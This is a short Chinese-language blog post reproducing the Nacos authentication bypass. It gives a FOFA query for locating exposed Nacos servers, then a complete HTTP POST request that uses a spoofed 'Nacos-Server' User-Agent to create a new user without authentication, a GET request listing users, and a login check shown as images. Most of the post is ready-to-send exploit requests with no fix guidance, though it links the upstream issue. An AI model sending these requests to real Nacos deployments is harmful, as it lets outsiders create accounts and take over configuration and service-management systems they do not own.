搜索

Nacos 认证绕过

小数志

共 840字,需浏览 2分钟

 ·

2021-02-05 12:21

Nacos 认证绕过


FOFA:title=nacos

一、漏洞概述

一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。

二、漏洞复现

2.1添加用户

POST /nacos/v1/auth/users?username=aaaa&password=bbbb HTTP/1.1
Host: 192.168.1.2
User-Agent: Nacos-Server
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
421ff16969b6e463ff6f36109fb17baa.webp

2.2添加成功

GET /nacos/v1/auth/users?pageNo=1&pageSize=100 HTTP/1.1
Host: 192.168.1.2
User-Agent: Nacos-Server
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
43e77ae5fd9852049072ecd03e925ca9.webp

2.3登录测试

5bc1a525eecdb88e2f6cfc8fe9ceaf6f.webp参考:

https://github.com/alibaba/nacos/issues/4593
https://www.t00ls.net/articles-59364.html
- END -


浏览 7
点赞
评论
收藏
分享

手机扫一扫分享

分享
举报
评论
图片
表情
推荐
CVE-2022-23131漏洞复现 | 身份认证绕过
白帽子社区
0
Nacos 惊爆安全漏洞,可绕过身份验证(附修复建议)
公众号程序猿DD
0
阿里 Nacos 惊爆,安全漏洞以绕过身份验证(附修复建议)
猿天地
0
阿里 Nacos 惊爆,安全漏洞以绕过身份验证(附修复建议)
码农沉思录
0
阿里 Nacos 惊爆,安全漏洞以绕过身份验证(附修复建议)
架构真经
0
阿里 Nacos 惊爆,安全漏洞以绕过身份验证(附修复建议)
JAVA公众号
0
阿里 Nacos 惊爆,安全漏洞以绕过身份验证(附修复建议)
小哈学Java
0
及时打补丁!警惕NETGEAR智能交换机的严重认证绕过漏洞
中科天齐软件源代码安全检测中心
0
Nacos 两周年献礼,Nacos 1.3.2 发布
Nacos 自 2018 年 8 月 5 日开源以来,在社区两年的共同努力之下,获得了 13400+ stars,发布了 30 个版本,吸引了 125 位优秀贡献者,积累了上百家企业案例的成绩。在 Nacos 开源两周年之际,社区同时发布 Nacos 1....
JAVA架构日记
0
SpringBoot整合Nacos
Java大联盟
0
点赞
评论
收藏
分享

手机扫一扫分享

分享
举报